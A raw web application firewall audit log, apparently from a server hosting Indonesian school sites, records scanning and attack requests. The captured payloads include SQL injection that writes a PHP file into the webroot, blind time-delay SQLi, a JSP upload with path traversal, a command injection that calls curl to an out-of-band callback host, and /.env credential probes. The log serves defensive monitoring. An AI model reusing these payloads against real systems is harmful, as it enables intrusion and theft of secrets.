"Matched Data: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi' found within MATCHED_VAR: 3');select unhex('3c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b') into outfile '.\x5c\x5c..\x5c\x5c..\x5c\x5cWebRoot\x5c\x5cplom.xgi'"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877621285689 3957 (- - -) Stopwatch2: 1747877621285689 3957; combined=2632, p1=496, p2=2102, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7d1ab12-Z-- --78dbbd08-A-- [22/May/2025:08:33:42 +0700] aC5-9iektx75wRFPQyiCwgAAAMs 103.236.140.4 42906 103.236.140.4 8181 --78dbbd08-B-- POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=unmhudndps.jsp%00 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 27 User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202) Accept: */* Accept-Language: en Content-Encoding: UTF_8 Content-Type: application/octet-stream serverEnable: localserver X-Forwarded-For: 45.32.66.146 Cookie: LA_K1=langid X-Varnish: 159417366 --78dbbd08-C-- 2xOmGMKL3aNr1bQHLFbc1wZx7QE --78dbbd08-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78dbbd08-E-- --78dbbd08-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:filename outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:filename=unmhudndps.jsp\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747877622285316 3159 (- - -) Stopwatch2: 1747877622285316 3159; combined=1613, p1=448, p2=1136, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78dbbd08-Z-- --228a4017-A-- [22/May/2025:08:35:59 +0700] aC5_f2friXjg62qQwE_o1wAAAIE 103.236.140.4 43062 103.236.140.4 8181 --228a4017-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --228a4017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --228a4017-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747877759834742 767 (- - -) Stopwatch2: 1747877759834742 767; combined=332, p1=295, p2=0, p3=0, p4=0, p5=37, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --228a4017-Z-- --61996435-A-- [22/May/2025:08:50:05 +0700] aC6CzX0O04WKE1HJ5iQDoQAAABY 103.236.140.4 44098 103.236.140.4 8181 --61996435-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 91.206.169.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.206.169.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-J737A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --61996435-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61996435-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747878605204029 876 (- - -) Stopwatch2: 1747878605204029 876; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61996435-Z-- --b21db840-A-- [22/May/2025:08:54:53 +0700] aC6D7eThJmFSRJ5-OZdcaQAAAFU 103.236.140.4 44362 103.236.140.4 8181 --b21db840-B-- POST /newsedit/newsplan/task/binary.do HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 166 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 159418172 --b21db840-C-- TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+'0:0:3';select+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1 --b21db840-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b21db840-E-- --b21db840-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /newsedit/newsplan/task/binary.do"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747878893345129 4272 (- - -) Stopwatch2: 1747878893345129 4272; combined=2439, p1=535, p2=1864, p3=0, p4=0, p5=39, sr=82, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b21db840-Z-- --339fd97e-A-- [22/May/2025:09:19:30 +0700] aC6Jsn0O04WKE1HJ5iQEowAAAAg 103.236.140.4 46130 103.236.140.4 8181 --339fd97e-B-- POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=zewmnfgq.jsp&filename=1.jpg HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 250 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Content-Type: multipart/form-data Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 159419072 --339fd97e-C-- ------WebKitFormBoundary92pUawKc Content-Disposition: form-data; name="myFile";filename="test.jpg" <% out.println("ybeckexomb");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ------WebKitFormBoundary92pUawKc-- --339fd97e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --339fd97e-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747880370417461 6667 (- - -) Stopwatch2: 1747880370417461 6667; combined=4786, p1=505, p2=4247, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --339fd97e-Z-- --84f26155-A-- [22/May/2025:09:21:35 +0700] aC6KL30O04WKE1HJ5iQErgAAABA 103.236.140.4 46278 103.236.140.4 8181 --84f26155-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Accept-Charset: utf-8 --84f26155-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84f26155-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747880495736511 827 (- - -) Stopwatch2: 1747880495736511 827; combined=339, p1=297, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84f26155-Z-- --ca428a6e-A-- [22/May/2025:09:22:24 +0700] aC6KYGfriXjg62qQwE_pjgAAAII 103.236.140.4 46338 103.236.140.4 8181 --ca428a6e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 Accept-Charset: utf-8 --ca428a6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca428a6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747880544570796 744 (- - -) Stopwatch2: 1747880544570796 744; combined=327, p1=268, p2=0, p3=0, p4=0, p5=59, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca428a6e-Z-- --72c2c474-A-- [22/May/2025:09:35:35 +0700] aC6Ndyektx75wRFPQyiFZgAAAMA 103.236.140.4 53538 103.236.140.4 8181 --72c2c474-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 142.93.129.190 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --72c2c474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72c2c474-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747881335685483 653 (- - -) Stopwatch2: 1747881335685483 653; combined=252, p1=224, p2=0, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72c2c474-Z-- --ebd10247-A-- [22/May/2025:09:43:38 +0700] aC6PWuThJmFSRJ5-OZdf8gAAAE4 103.236.140.4 54266 103.236.140.4 8181 --ebd10247-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --ebd10247-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebd10247-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747881818880284 799 (- - -) Stopwatch2: 1747881818880284 799; combined=381, p1=340, p2=0, p3=0, p4=0, p5=41, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebd10247-Z-- --7801fe11-A-- [22/May/2025:09:43:40 +0700] aC6PXOThJmFSRJ5-OZdf9AAAAEc 103.236.140.4 54272 103.236.140.4 8181 --7801fe11-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 151.4.150.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 151.4.150.42 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --7801fe11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7801fe11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747881820869063 689 (- - -) Stopwatch2: 1747881820869063 689; combined=289, p1=252, p2=0, p3=0, p4=0, p5=36, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7801fe11-Z-- --4dd73f6a-A-- [22/May/2025:10:02:31 +0700] aC6Tx30O04WKE1HJ5iQHDAAAABU 103.236.140.4 55896 103.236.140.4 8181 --4dd73f6a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.173.200.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.173.200.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4dd73f6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dd73f6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747882951971815 3142 (- - -) Stopwatch2: 1747882951971815 3142; combined=1336, p1=476, p2=832, p3=0, p4=0, p5=28, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dd73f6a-Z-- --c5b21365-A-- [22/May/2025:10:07:38 +0700] aC6U-mfriXjg62qQwE_siAAAAI0 103.236.140.4 56264 103.236.140.4 8181 --c5b21365-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.214.238.62 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.214.238.62 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --c5b21365-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5b21365-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747883258011752 783 (- - -) Stopwatch2: 1747883258011752 783; combined=337, p1=278, p2=0, p3=0, p4=0, p5=59, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5b21365-Z-- --0dab731f-A-- [22/May/2025:10:07:38 +0700] aC6U-iektx75wRFPQyiGnAAAAMM 103.236.140.4 56272 103.236.140.4 8181 --0dab731f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.214.238.62 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.214.238.62 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --0dab731f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dab731f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747883258970168 796 (- - -) Stopwatch2: 1747883258970168 796; combined=378, p1=339, p2=0, p3=0, p4=0, p5=38, sr=127, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dab731f-Z-- --caf94833-A-- [22/May/2025:10:12:42 +0700] aC6WKuThJmFSRJ5-OZdg_gAAAFg 103.236.140.4 56674 103.236.140.4 8181 --caf94833-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.68.235.128 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.68.235.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --caf94833-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --caf94833-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747883562291474 843 (- - -) Stopwatch2: 1747883562291474 843; combined=391, p1=350, p2=0, p3=0, p4=0, p5=41, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --caf94833-Z-- --4084587b-A-- [22/May/2025:10:16:15 +0700] aC6W_2friXjg62qQwE_sswAAAIA 103.236.140.4 56900 103.236.140.4 8181 --4084587b-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 171 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168480875 --4084587b-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0mbkqa4kqtm561jt3n0zrkxhb54h77kk.oast.fun`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --4084587b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4084587b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747883775159445 3106 (- - -) Stopwatch2: 1747883775159445 3106; combined=2013, p1=464, p2=1480, p3=20, p4=24, p5=25, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4084587b-Z-- --4bbf595f-A-- [22/May/2025:10:30:37 +0700] aC6aXSektx75wRFPQyiHKQAAANU 103.236.140.4 57966 103.236.140.4 8181 --4bbf595f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 142.93.129.190 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --4bbf595f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bbf595f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747884637016946 847 (- - -) Stopwatch2: 1747884637016946 847; combined=345, p1=305, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bbf595f-Z-- --7cb55a4d-A-- [22/May/2025:10:32:22 +0700] aC6axiektx75wRFPQyiHSQAAAMg 103.236.140.4 58138 103.236.140.4 8181 --7cb55a4d-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 